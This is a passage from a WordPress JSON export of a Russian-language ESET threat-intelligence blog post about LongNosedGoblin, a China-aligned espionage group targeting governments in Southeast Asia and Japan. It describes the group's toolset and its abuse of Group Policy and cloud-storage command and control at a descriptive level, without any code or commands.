{"id":8880,"date":"2025-12-18T12:00:00","date_gmt":"2025-12-18T10:00:00","guid":{"rendered":"https:\/\/blog.eset.ee\/et\/?p=8880"},"modified":"2026-06-14T19:55:16","modified_gmt":"2026-06-14T16:55:16","slug":"longnosedgoblin-pytaetsya-uznat-o-delah-pravitelstv-yugo-vostochnoj-azii-i-yaponii-2","status":"publish","type":"post","link":"https:\/\/blog.eset.ee\/et\/ru\/2025\/12\/18\/longnosedgoblin-pytaetsya-uznat-o-delah-pravitelstv-yugo-vostochnoj-azii-i-yaponii-2\/","title":{"rendered":"LongNosedGoblin \u043f\u044b\u0442\u0430\u0435\u0442\u0441\u044f \u0443\u0437\u043d\u0430\u0442\u044c \u043e \u0434\u0435\u043b\u0430\u0445 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432 \u042e\u0433\u043e-\u0412\u043e\u0441\u0442\u043e\u0447\u043d\u043e\u0439 \u0410\u0437\u0438\u0438 \u0438 \u042f\u043f\u043e\u043d\u0438\u0438"},"content":{"rendered":"<p>\u0412 2024 \u0433\u043e\u0434\u0443 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 ESET \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0438 \u0440\u0430\u043d\u0435\u0435 \u043d\u0435 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e \u0432 \u0441\u0435\u0442\u0438 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0433\u043e \u0443\u0447\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f \u042e\u0433\u043e-\u0412\u043e\u0441\u0442\u043e\u0447\u043d\u043e\u0439 \u0410\u0437\u0438\u0438. \u042d\u0442\u043e \u043f\u0440\u0438\u0432\u0435\u043b\u043e \u043d\u0430\u0441 \u043a \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044e \u0435\u0449\u0435 \u0431\u043e\u043b\u044c\u0448\u0435\u0433\u043e \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u0430 \u043d\u043e\u0432\u043e\u0433\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u0432 \u0442\u043e\u0439 \u0436\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u0435, \u043d\u0438 \u043e\u0434\u043d\u043e \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043d\u0435 \u0438\u043c\u0435\u043b\u043e \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0445 \u0441\u0432\u044f\u0437\u0435\u0439 \u0441 \u0440\u0430\u043d\u0435\u0435 \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u043c\u044b\u043c\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438. \u041e\u0441\u043d\u043e\u0432\u044b\u0432\u0430\u044f\u0441\u044c \u043d\u0430 \u043d\u0430\u0448\u0438\u0445 \u0432\u044b\u0432\u043e\u0434\u0430\u0445, \u043c\u044b \u0440\u0435\u0448\u0438\u043b\u0438 \u043e\u0442\u043d\u0435\u0441\u0442\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u043a \u043d\u043e\u0432\u043e\u0439 \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u043e\u0439 \u0441 \u041a\u0438\u0442\u0430\u0435\u043c APT-\u0433\u0440\u0443\u043f\u043f\u0435, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043c\u044b \u043d\u0430\u0437\u0432\u0430\u043b\u0438 LongNosedGoblin.<\/p>\n<p>\u0413\u0440\u0443\u043f\u043f\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0440\u0430\u0437\u043d\u043e\u043e\u0431\u0440\u0430\u0437\u043d\u044b\u0439 \u043d\u0430\u0431\u043e\u0440 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432, \u0441\u043e\u0441\u0442\u043e\u044f\u0449\u0438\u0439 \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c \u0438\u0437 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 C#\/.NET, \u0438, \u0447\u0442\u043e \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u0432\u0430\u0436\u043d\u043e, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0433\u0440\u0443\u043f\u043f\u043e\u0432\u0443\u044e \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0443 \u0434\u043b\u044f \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f \u0441\u0432\u043e\u0435\u0433\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u0438 \u0431\u043e\u043a\u043e\u0432\u043e\u0433\u043e \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u044f \u043f\u043e \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c \u0446\u0435\u043b\u0435\u0432\u044b\u0445 \u043e\u0431\u044a\u0435\u043a\u0442\u043e\u0432. \u0412 \u044d\u0442\u043e\u043c \u0431\u043b\u043e\u0433\u0435 \u043c\u044b \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u043c \u043d\u0430\u0448\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435 LongNosedGoblin, \u0440\u0430\u0441\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0435\u043c \u0435\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0435 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u0438 \u043f\u043e\u0433\u0440\u0443\u0436\u0430\u0435\u043c\u0441\u044f \u0432 \u043d\u0430\u0431\u043e\u0440 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0433\u0440\u0443\u043f\u043f\u044b.<\/p>\n<blockquote>\n<div><strong>\u041a\u043b\u044e\u0447\u0435\u0432\u044b\u0435 \u043c\u043e\u043c\u0435\u043d\u0442\u044b \u043e\u0442\u0447\u0435\u0442\u0430:<\/strong><\/div>\n<ul>\n<li>LongNosedGoblin \u2014 \u044d\u0442\u043e \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u0430\u044f \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u041a\u0438\u0442\u0430\u0435\u043c APT-\u0433\u0440\u0443\u043f\u043f\u0430, \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u043d\u0430\u044f \u043d\u0430 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u0443\u0447\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f \u0432 \u042e\u0433\u043e-\u0412\u043e\u0441\u0442\u043e\u0447\u043d\u043e\u0439 \u0410\u0437\u0438\u0438 \u0438 \u042f\u043f\u043e\u043d\u0438\u0438 \u0441 \u0446\u0435\u043b\u044c\u044e \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0430.<\/li>\n<li>\u0413\u0440\u0443\u043f\u043f\u0430 \u0430\u043a\u0442\u0438\u0432\u043d\u0430 \u043a\u0430\u043a \u043c\u0438\u043d\u0438\u043c\u0443\u043c \u0441 \u0441\u0435\u043d\u0442\u044f\u0431\u0440\u044f 2023 \u0433\u043e\u0434\u0430.<\/li>\n<li>LongNosedGoblin \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0433\u0440\u0443\u043f\u043f\u043e\u0432\u0443\u044e \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0443 \u0434\u043b\u044f \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u0432 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0441\u0435\u0442\u0438, \u0430 \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u044b (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, Microsoft OneDrive \u0438 Google Drive) \u2014 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u043a\u043e\u043c\u0430\u043d\u0434 \u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f (C&amp;C).<\/li>\n<li>\u041e\u0434\u0438\u043d \u0438\u0437 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0433\u0440\u0443\u043f\u043f\u044b, NosyHistorian, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u0441\u0431\u043e\u0440\u0430 \u0438\u0441\u0442\u043e\u0440\u0438\u0438 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430 \u0438 \u043f\u0440\u0438\u043d\u044f\u0442\u0438\u044f \u0440\u0435\u0448\u0435\u043d\u0438\u0439 \u043e \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u043c \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e, \u0442\u0430\u043a\u043e\u0433\u043e \u043a\u0430\u043a \u0431\u044d\u043a\u0434\u043e\u0440 NosyDoor.<\/li>\n<li>NosyDoor, \u0441\u043a\u043e\u0440\u0435\u0435 \u0432\u0441\u0435\u0433\u043e, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u043c\u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u043c\u0438 \u0441 \u041a\u0438\u0442\u0430\u0435\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438.<\/li>\n<li>\u041c\u044b \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u043c \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u044b\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 NosyHistorian, NosyDoor, NosyStealer, NosyDownloader, NosyLogger \u0438 \u0434\u0440\u0443\u0433\u0438\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0445 LongNosedGoblin.<\/li>\n<\/ul>\n<\/blockquote>\n<h2>\u041f\u0430\u0445\u043d\u0435\u0442 \u043d\u0435\u043f\u0440\u0438\u044f\u0442\u043d\u043e\u0441\u0442\u044f\u043c\u0438: \u0417\u043d\u0430\u043a\u043e\u043c\u044c\u0442\u0435\u0441\u044c, LongNosedGoblin<\/h2>\n<p>LongNosedGoblin \u2014 \u044d\u0442\u043e \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u041a\u0438\u0442\u0430\u0435\u043c APT-\u0433\u0440\u0443\u043f\u043f\u0430, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u0430 \u043d\u0430 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u0443\u0447\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f \u0432 \u042e\u0433\u043e-\u0412\u043e\u0441\u0442\u043e\u0447\u043d\u043e\u0439 \u0410\u0437\u0438\u0438 \u0438 \u042f\u043f\u043e\u043d\u0438\u0438 \u0441 \u0446\u0435\u043b\u044c\u044e \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0430. \u041a\u0430\u043a \u043c\u044b \u0443\u0436\u0435 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u043b\u0438: \u0432 \u0441\u0432\u043e\u0438\u0445 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f\u0445 LongNosedGoblin \u0437\u043b\u043e\u0443\u043f\u043e\u0442\u0440\u0435\u0431\u043b\u044f\u0435\u0442 <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows-server\/identity\/ad-ds\/manage\/group-policy\/group-policy-overview\">\u0433\u0440\u0443\u043f\u043f\u043e\u0432\u043e\u0439 \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u043e\u0439<\/a> \u2014 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u043e\u043c \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430\u043c\u0438 \u0438 \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u044f\u043c\u0438 \u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430\u0445 Windows, \u043e\u0431\u044b\u0447\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u043c \u0441 Active Directory \u2014 \u0434\u043b\u044f \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u0438 \u0431\u043e\u043a\u043e\u0432\u043e\u0433\u043e \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u044f \u043f\u043e \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0441\u0435\u0442\u0438.<\/p>\n<p>\u041e\u0434\u043d\u0438\u043c \u0438\u0437 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0432 \u0435\u0435 \u0430\u0440\u0441\u0435\u043d\u0430\u043b\u0435 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f NosyHistorian, \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 C#\/.NET, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0433\u0440\u0443\u043f\u043f\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0434\u043b\u044f \u0441\u0431\u043e\u0440\u0430 \u0438\u0441\u0442\u043e\u0440\u0438\u0438 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u0430\u0442\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u0438\u044f \u043c\u0435\u0441\u0442\u0430 \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u0433\u043e \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e. \u042d\u0442\u043e \u0432\u043a\u043b\u044e\u0447\u0430\u0435\u0442 \u0432 \u0441\u0435\u0431\u044f \u0434\u0440\u0443\u0433\u043e\u0439 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 LongNosedGoblin, \u0431\u044d\u043a\u0434\u043e\u0440, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043c\u044b \u043d\u0430\u0437\u0432\u0430\u043b\u0438 NosyDoor, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u043c\u044b\u0445 \u043d\u0430\u043c\u0438 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f\u0445 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b Microsoft OneDrive \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 C&amp;C. NosyDoor \u0442\u0430\u043a\u0436\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0442\u0435\u0445\u043d\u0438\u043a\u0438 \u00ab\u0436\u0438\u0442\u044c \u0437\u0430 \u0441\u0447\u0435\u0442 \u0437\u0435\u043c\u043b\u0438\u00bb (living-off-the-land) \u0432 \u0441\u0432\u043e\u0435\u0439 \u0446\u0435\u043f\u043e\u0447\u043a\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f, \u0430 \u0438\u043c\u0435\u043d\u043d\u043e <a href=\"https:\/\/attack.mitre.org\/techniques\/T1574\/014\/\">\u0438\u043d\u044a\u0435\u043a\u0446\u0438\u044e AppDomainManager<\/a>. \u041d\u0430\u043a\u043e\u043d\u0435\u0446, \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0433\u0440\u0443\u043f\u043f\u044b \u043c\u043e\u0433\u0443\u0442 \u043e\u0431\u0445\u043e\u0434\u0438\u0442\u044c <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/amsi\/antimalware-scan-interface-portal\">\u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u043e\u0433\u043e \u041f\u041e<\/a> (AMSI), \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u044b\u043c \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u043c \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u0441\u043a\u0440\u0438\u043f\u0442\u044b \u043f\u0435\u0440\u0435\u0434 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435\u043c.<\/p>\n<h3>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435<\/h3>\n<p>\u0412 \u0444\u0435\u0432\u0440\u0430\u043b\u0435 2024 \u0433\u043e\u0434\u0430 \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0433\u043e \u0443\u0447\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f \u0432 \u042e\u0433\u043e-\u0412\u043e\u0441\u0442\u043e\u0447\u043d\u043e\u0439 \u0410\u0437\u0438\u0438. \u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u043e\u0441\u044c \u0434\u043b\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u0431\u044d\u043a\u0434\u043e\u0440\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043c\u044b \u043f\u043e\u0437\u0436\u0435 \u043d\u0430\u0437\u0432\u0430\u043b\u0438 NosyDoor. \u0412 \u0442\u043e \u0436\u0435 \u0432\u0440\u0435\u043c\u044f \u043c\u044b \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0438, \u0447\u0442\u043e \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u044f \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u043b\u0430 \u043d\u0435 \u043e\u0434\u043d\u0443, \u0430 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043c\u0430\u0448\u0438\u043d \u043e\u0434\u043d\u043e\u0433\u043e \u0438 \u0442\u043e\u0433\u043e \u0436\u0435 \u0443\u0447\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f, \u043f\u0440\u0438\u0447\u0435\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e \u0431\u044b\u043b\u043e \u0440\u0430\u0437\u0432\u0435\u0440\u043d\u0443\u0442\u043e \u0447\u0435\u0440\u0435\u0437 \u0433\u0440\u0443\u043f\u043f\u043e\u0432\u0443\u044e \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0443.<\/p>\n<p>\u0414\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u043f\u043e\u043a\u0430\u0437\u0430\u043b, \u0447\u0442\u043e \u0442\u0435 \u0436\u0435 \u0436\u0435\u0440\u0442\u0432\u044b \u0442\u0430\u043a\u0436\u0435 \u0431\u044b\u043b\u0438 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u044b \u0434\u0440\u0443\u0433\u0438\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u043c, \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u043c\u044b\u043c \u0447\u0435\u0440\u0435\u0437 \u0433\u0440\u0443\u043f\u043f\u043e\u0432\u0443\u044e \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0443, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f \u0434\u043b\u044f \u0441\u0431\u043e\u0440\u0430 \u0438\u0441\u0442\u043e\u0440\u0438\u0438 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430. \u041c\u044b \u043d\u0430\u0437\u0432\u0430\u043b\u0438 \u044d\u0442\u043e\u0442 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 NosyHistorian. \u0425\u043e\u0442\u044f \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u043e \u0436\u0435\u0440\u0442\u0432, \u043f\u043e\u0441\u0442\u0440\u0430\u0434\u0430\u0432\u0448\u0438\u0445 \u043e\u0442 NosyHistorian \u0432 \u0445\u043e\u0434\u0435 \u043d\u0430\u0448\u0435\u0433\u043e \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0440\u0430\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u043c\u0435\u0436\u0434\u0443 \u044f\u043d\u0432\u0430\u0440\u0435\u043c \u0438 \u043c\u0430\u0440\u0442\u043e\u043c 2024 \u0433\u043e\u0434\u0430, \u043b\u0438\u0448\u044c \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u0430\u044f \u0447\u0430\u0441\u0442\u044c \u0438\u0437 \u043d\u0438\u0445 \u0431\u044b\u043b\u0430 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0430 NosyDoor. \u041d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u0431\u0440\u0430\u0437\u0446\u044b \u0434\u0440\u043e\u043f\u043f\u0435\u0440\u0430 NosyDoor \u0434\u0430\u0436\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b\u0438 \u0437\u0430\u0449\u0438\u0442\u043d\u044b\u0435 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u044b \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f, \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0432\u0430\u044e\u0449\u0438\u0435 \u0440\u0430\u0431\u043e\u0442\u0443 \u0442\u043e\u043b\u044c\u043a\u043e \u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430\u0445 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u0436\u0435\u0440\u0442\u0432.<\/p>\n<p>\u041f\u043e\u0437\u0436\u0435 \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0435\u0449\u0435 \u0431\u043e\u043b\u044c\u0448\u0435 \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0433\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u043d\u0430 \u043c\u0430\u0448\u0438\u043d\u0430\u0445 \u0436\u0435\u0440\u0442\u0432: NosyStealer, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0438\u0437\u0432\u043b\u0435\u043a\u0430\u0435\u0442 \u0434\u0430\u043d\u043d\u044b\u0435 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430; NosyDownloader, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0432 \u043f\u0430\u043c\u044f\u0442\u0438; NosyLogger, \u043a\u0435\u0439\u043b\u043e\u0433\u0433\u0435\u0440; \u0434\u0440\u0443\u0433\u0438\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b, \u0442\u0430\u043a\u0438\u0435 \u043a\u0430\u043a \u043e\u0431\u0440\u0430\u0442\u043d\u044b\u0439 SOCKS5-\u043f\u0440\u043e\u043a\u0441\u0438; \u0438 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u043e\u0432 (\u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435, \u043f\u0435\u0440\u0435\u0434\u0430\u043d\u043d\u043e\u0435 \u043a\u0430\u043a \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442), \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u043e\u0441\u044c \u0434\u043b\u044f \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0432\u0438\u0434\u0435\u043e\u043c\u0430\u0433\u043d\u0438\u0442\u043e\u0444\u043e\u043d\u0430, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, <a href=\"https:\/\/ffmpeg.org\/\">FFmpeg<\/a>, \u0434\u043b\u044f \u0437\u0430\u043f\u0438\u0441\u0438 \u0430\u0443\u0434\u0438\u043e \u0438 